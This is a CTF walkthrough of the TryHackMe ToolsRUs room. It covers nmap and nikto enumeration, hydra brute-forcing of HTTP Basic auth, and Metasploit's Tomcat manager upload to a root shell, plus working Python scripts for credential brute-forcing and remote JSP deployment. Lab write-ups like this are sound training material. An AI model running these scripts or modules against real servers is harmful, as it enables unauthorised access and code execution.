TryHackMe | ToolsRUs
This is one (of many) walkthroughs for the ToolsRUs CTF room. As always, I follow a few simple enumeration steps and let them expose the machine's flaws, which is what this article walks through.
Enumeration
As usual, I use nmap to see which ports are open.
┌──(root㉿kali)-[~]
└─$ nmap -sCV $IP-ADDRESS
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-10 15:21 UTC
Nmap scan report for ip-10-10-44-157.eu-west-1.compute.internal (10.10.44.157)
Host is up (0.0024s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 0778865de34f25a439399d85a904ac26 (RSA)
| 256 630d6bfb3654eeb5d30b30d448e03062 (ECDSA)
|_ 256 2afc539dbe521922a9610e7f056ef274 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
1234/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
MAC Address: 02:D0:4F:84:D6:57 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.56 seconds
The scan shows several open ports. Port 80 is a web server, so the next step is to run dirbuster against it to brute-force hidden directories and files.
$ dirbuster -u http://$IP-ADDRESS -l /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -e php,html,txt,js
This takes a while, so go for a coffee or read more articles from my profile 🤓 (joking, not joking). The dirbuster results are enough to answer the first three questions.
1. What directory can you find, that begins with a "g"? guidelines
2. Whose name can you find from this directory? bob
3. What directory has basic authentication? protected
Accessing /protected, you notice that this page, as its name suggests, is protected: the server asks for HTTP Basic authentication. That is the perfect scenario for hydra, but I didn't know yet which hydra module to use. After some research it turned out that http-get is the right one, because Basic authentication is just a header on an ordinary GET request. We already have a likely username (bob, from /guidelines), so only the password needs guessing.
$ hydra -f -vV -l bob -P /usr/share/wordlists/rockyou.txt $IP-ADDRESS http-get /protected
[ATTEMPT] target $IP-ADDRESS - login "bob" - pass "justin" - 37 of 14344399 [child 3] (0/0)
...
[ATTEMPT] target $IP-ADDRESS - login "bob" - pass "amanda" - 51 of 14344399 [child 12] (0/0)
[80][http-get] host: $IP-ADDRESS login: bob password: bubbles
[STATUS] attack finished for 10.10.44.157 (valid pair found)
4. What is bob’s password to the protected part of the website? bubbles
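To make clear what hydra's http-get module is actually doing, here is an added example of my own (not part of the room and not the original walkthrough's code): a stand-in for the /protected realm served locally with the constructed credentials bob:bubbles, and a small brute-forcer that sends Authorization: Basic headers and treats any status other than 401 as a hit. The local server and the six-word wordlist are constructed stand-ins, not the real target or rockyou.

```python
import base64
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import Request, ProxyHandler, build_opener
from urllib.error import HTTPError

# Constructed stand-in for the room's /protected realm (not the real target).
REALM_USER, REALM_PASS = "bob", "bubbles"

# Constructed slice of a password list; rockyou.txt has ~14 million lines.
WORDLIST = ["123456", "password", "justin", "amanda", "bubbles", "iloveyou"]


def basic_auth_header(user, password):
    """Value of the Authorization header for HTTP Basic auth: base64("user:pass")."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


class ProtectedHandler(BaseHTTPRequestHandler):
    """Apache-like Basic-auth gate: 401 + WWW-Authenticate until the right header arrives."""

    def do_GET(self):
        expected = basic_auth_header(REALM_USER, REALM_PASS)
        if self.path.startswith("/protected") and self.headers.get("Authorization") != expected:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="protected"')
            self.end_headers()
            return
        body = b"<h1>protected</h1>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server():
    """Bind the stand-in realm on a free loopback port and serve it in a background thread."""
    srv = HTTPServer(("127.0.0.1", 0), ProtectedHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def try_login(url, user, password):
    """True if the server does not answer 401: the same success test hydra's http-get uses."""
    opener = build_opener(ProxyHandler({}))  # ignore any http_proxy in the environment
    req = Request(url, headers={"Authorization": basic_auth_header(user, password)})
    try:
        with opener.open(req, timeout=5) as resp:
            return resp.status != 401
    except HTTPError as e:
        return e.code != 401


def brute_force(url, user, wordlist):
    """Walk the wordlist and stop at the first accepted password (hydra's -f behaviour)."""
    for candidate in wordlist:
        if try_login(url, user, candidate):
            return candidate
    return None


if __name__ == "__main__":
    srv = start_server()
    url = f"http://127.0.0.1:{srv.server_port}/protected"
    print("bob ->", brute_force(url, "bob", WORDLIST))
    srv.shutdown()
```

The success test is the one hydra relies on: a Basic realm answers 401 until the right pair arrives, so anything else counts as a valid login. On a real engagement that assumption breaks with lockouts, rate limits, or a WAF that starts answering 403, which is why you always confirm a hydra hit by hand (here, a plain browser visit to /protected with bob:bubbles).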
The answers to the next two questions are already in the nmap output above.
5. What other port that serves a web service is open on the machine? 1234
6. Going to the service running on that port, what is the name and version of the software? Apache Tomcat/7.0.88
At this point, my next challenge was to get comfortable with Nikto.
$ nikto -host http://$IP-ADDRESS:1234/manager/html
+ Target IP: $IP-ADDRESS
+ Target Hostname: $IP-ADDRESS
+ Target Port: 1234
+ Start Time: 2023-02-10 15:49:40 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-3092: /manager/html/localstart.asp: This may be interesting...
+ OSVDB-3233: /manager/html/manager/manager-howto.html: Tomcat documentation found.
+ OSVDB-3233: /manager/html/jk-manager/manager-howto.html: Tomcat documentation found.
+ OSVDB-3233: /manager/html/jk-status/manager-howto.html: Tomcat documentation found.
+ OSVDB-3233: /manager/html/admin/manager-howto.html: Tomcat documentation found.
+ OSVDB-3233: /manager/html/host-manager/manager-howto.html: Tomcat documentation found.
+ /manager/html/manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html/jk-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html/jk-status/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html/admin/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html/host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html/httpd.conf: Apache httpd.conf configuration file
+ /manager/html/httpd.conf.bak: Apache httpd.conf configuration file
+ /manager/html/manager/status: Default Tomcat Server Status interface found
+ /manager/html/jk-manager/status: Default Tomcat Server Status interface found
+ /manager/html/jk-status/status: Default Tomcat Server Status interface found
+ /manager/html/admin/status: Default Tomcat Server Status interface found
+ /manager/html/host-manager/status: Default Tomcat Server Status interface found
+ 8042 requests: 0 error(s) and 24 item(s) reported on remote host
+ End Time: 2023-02-10 15:50:22 (GMT0) (42 seconds)
From this massive output, I noticed potential vulnerabilities that I could exploit with Metasploit. Note that the scan was pointed at /manager/html, so nikto prefixed that path to every check it made; treat the repeated /manager/html/.../html and .../status entries as one finding. What matters is that the Tomcat Manager interface is reachable and that the PUT and DELETE methods are allowed.
7. How many documentation files did Nikto identify? 5
8. What is the server version (run the scan against port 80)? Apache/2.4.18
9. What version of Apache-Coyote is this service using? 1.1
For the last two questions, I had to research which exploit was needed. The nikto output points at file upload to the web server: the Tomcat Manager is exposed and PUT is allowed, and the manager exists precisely to deploy WAR applications. 🤔 A generic search for "tomcat metasploit" turned up a very nice article on exactly this problem. The catch is that every manager exploit is authenticated, so the real flaw here is credential reuse: bob's password for the Apache realm also works on the Tomcat Manager.
$ msfconsole
# search for tomcat exploits
msf6 > search tomcat
....
   0   auxiliary/dos/http/apache_commons_fileupload_dos                 2014-02-06  normal     No   Apache Commons FileUpload and Apache Tomcat DoS
   1   exploit/multi/http/struts_dev_mode                               2012-01-06  excellent  Yes  Apache Struts 2 Developer Mode OGNL Execution
   2   exploit/multi/http/struts2_namespace_ognl                        2018-08-22  excellent  Yes  Apache Struts 2 Namespace Redirect OGNL Injection
   3   exploit/multi/http/struts_code_exec_classloader                  2014-03-06  manual     No   Apache Struts ClassLoader Manipulation Remote Code Execution
   4   auxiliary/admin/http/tomcat_ghostcat                             2020-02-20  normal     Yes  Apache Tomcat AJP File Read
   5   exploit/windows/http/tomcat_cgi_cmdlineargs                      2019-04-10  excellent  Yes  Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
   6   exploit/multi/http/tomcat_mgr_deploy                             2009-11-09  excellent  Yes  Apache Tomcat Manager Application Deployer Authenticated Code Execution
   7   exploit/multi/http/tomcat_mgr_upload                             2009-11-09  excellent  Yes  Apache Tomcat Manager Authenticated Upload Code Execution
   8   auxiliary/dos/http/apache_tomcat_transfer_encoding               2010-07-09  normal     No   Apache Tomcat Transfer-Encoding Information Disclosure and DoS
   9   auxiliary/scanner/http/tomcat_enum                                           normal     No   Apache Tomcat User Enumeration
   10  exploit/multi/http/atlassian_confluence_webwork_ognl_injection   2021-08-25  excellent  Yes  Atlassian Confluence WebWork OGNL Injection
   11  exploit/windows/http/cayin_xpost_sql_rce                         2020-06-04  excellent  Yes  Cayin xPost wayfinder_seqid SQLi to RCE
....
# refine your search based on your goals
msf6 > search exploit/multi/http/tomcat
Matching Modules
================
   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  exploit/multi/http/tomcat_mgr_deploy         2009-11-09       excellent  Yes    Apache Tomcat Manager Application Deployer Authenticated Code Execution
   1  exploit/multi/http/tomcat_mgr_upload         2009-11-09       excellent  Yes    Apache Tomcat Manager Authenticated Upload Code Execution
   2  exploit/multi/http/tomcat_jsp_upload_bypass  2017-10-03       excellent  Yes    Tomcat RCE via JSP Upload Bypass
# I found my exploit
msf6 > use exploit/multi/http/tomcat_mgr_upload
# newer versions of this module call the credential options HttpUsername/HttpPassword; run 'show options' to check
msf6 exploit(multi/http/tomcat_mgr_upload) > set USERNAME bob
msf6 exploit(multi/http/tomcat_mgr_upload) > set PASSWORD bubbles
msf6 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS $IP-ADDRESS
msf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 1234
msf6 exploit(multi/http/tomcat_mgr_upload) > set TARGETURI /manager
# if the reverse handler never gets a connection, set LHOST to your VPN interface address
msf6 exploit(multi/http/tomcat_mgr_upload) > exploit
If I didn't forget anything, you should now have a Meterpreter session and can run commands on the server.
# whoami
meterpreter > getuid
Server username: root
# go for the flag
meterpreter > cd /root
meterpreter > cat flag.txt
ff1fc4a81affcc7688cf89ae7dc6e0e1
10. What user did you get a shell as? root
11. What text is in the file /root/flag.txt: ff1fc4a81affcc7688cf89ae7dc6e0e1
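The Metasploit module hides what actually happens: a WAR is uploaded through the Tomcat Manager and Tomcat runs the JSP inside it. To show that mechanism, here is an added example of my own (not the module's code and not from the original post) that builds a minimal WAR in memory and PUTs it to Tomcat's text manager API with the same reused credentials. The target URL, the context path /poc and the JSP name are assumptions; the JSP runs a fixed id command as proof of execution rather than taking a command from the request, so it proves code execution without leaving an open web shell on the box.

```python
import base64
import http.client
import io
import zipfile
from urllib.parse import urlencode, urlsplit

# Assumed target and context path (the room's real host is whatever $IP-ADDRESS was).
TARGET = "http://10.10.44.157:1234"
CONTEXT = "/poc"
JSP_NAME = "poc.jsp"

# Minimal deployment descriptor; Tomcat's default web.xml already maps *.jsp.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0"></web-app>
"""

# Proof-of-execution page with a hard-coded command (no request parameter, so no web shell).
JSP_POC = """<%@ page import="java.io.*" %>
<%
  Process p = Runtime.getRuntime().exec("id");
  BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
  String line;
  while ((line = r.readLine()) != null) { out.println(line); }
%>
"""


def build_war(jsp_name, jsp_source):
    """Return WAR bytes: a zip holding WEB-INF/web.xml plus the JSP at the archive root."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("WEB-INF/web.xml", WEB_XML)
        z.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war):
    """List the archive members, used to sanity-check the WAR before sending it."""
    with zipfile.ZipFile(io.BytesIO(war)) as z:
        return z.namelist()


def basic_auth(user, password):
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def build_deploy_request(context, war, user, password):
    """Assemble the manager text-API call: PUT the WAR to /manager/text/deploy?path=<context>."""
    path = "/manager/text/deploy?" + urlencode({"path": context, "update": "true"}, safe="/")
    headers = {
        "Authorization": basic_auth(user, password),
        "Content-Type": "application/octet-stream",
        "Content-Length": str(len(war)),
    }
    return "PUT", path, headers, war


def parse_manager_response(text):
    """The text manager answers one line: 'OK - ...' on success, 'FAIL - ...' otherwise."""
    first = text.strip().splitlines()[0] if text.strip() else ""
    return first.startswith("OK"), first


def deploy(target, context, war, user, password):
    """Send the deploy request to a live Tomcat and return (success, manager message)."""
    u = urlsplit(target)
    method, path, headers, body = build_deploy_request(context, war, user, password)
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=10)
    conn.request(method, path, body=body, headers=headers)
    resp = conn.getresponse()
    text = resp.read().decode(errors="replace")
    conn.close()
    if resp.status == 401:
        return False, "401: credentials rejected"
    if resp.status == 403:
        return False, "403: account lacks the manager-script role that /manager/text/ requires"
    return parse_manager_response(text)


if __name__ == "__main__":
    war = build_war(JSP_NAME, JSP_POC)
    print("WAR entries:", war_entries(war))
    ok, msg = deploy(TARGET, CONTEXT, war, "bob", "bubbles")
    print(msg)
    if ok:
        print(f"fetch {TARGET}{CONTEXT}/{JSP_NAME} to run it, then undeploy with "
              f"{TARGET}/manager/text/undeploy?path={CONTEXT}")
```

Two caveats a practitioner will hit. The /manager/text/ interface needs the manager-script role; an account that only holds manager-gui gets a 403 there, and then the route is the HTML form at /manager/html/upload (a multipart POST that also needs the CSRF nonce from the page), which is exactly what tomcat_mgr_upload automates. And because the JSP runs as the Tomcat process, the id output tells you immediately whether you are root, as in this room, before you bother with privilege escalation; undeploy the context afterwards so the proof-of-concept does not stay on the server.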
Conclusion
This CTF was really cool for testing tools that I don't usually use to solve challenges. Some extra research was necessary to take full advantage of them. The chain is worth remembering from the defensive side too: one weak password shared between the Apache realm and the Tomcat Manager, a manager interface reachable from the network, and Tomcat running as root turned a directory listing into a root shell with no privilege escalation needed. Kudos to TryHackMe for creating this one! 👍